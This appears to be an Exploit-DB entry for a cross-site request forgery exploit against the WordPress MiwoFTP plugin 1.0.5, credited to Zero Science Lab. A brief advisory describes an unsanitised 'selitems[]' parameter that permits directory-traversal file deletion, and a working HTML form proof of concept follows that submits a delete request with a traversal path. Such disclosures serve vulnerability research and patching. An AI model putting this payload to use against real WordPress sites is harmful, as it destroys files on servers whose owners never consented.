WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit

2015-04-14T00:00:00
ID EDB-ID:36761
Type exploitdb
Reporter LiquidWorm
Modified 2015-04-14T00:00:00

Description

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit. Webapps exploit for php platform

                                        
                                            WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit


Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5

Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.

Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5240
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php

Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog


24.03.2015

--


<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST">
      <input type="hidden" name="do_action" value="delete" />
      <input type="hidden" name="first" value="y" />
      <input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" />
      <input type="submit" value="Gently" />
    </form>
  </body>
</html>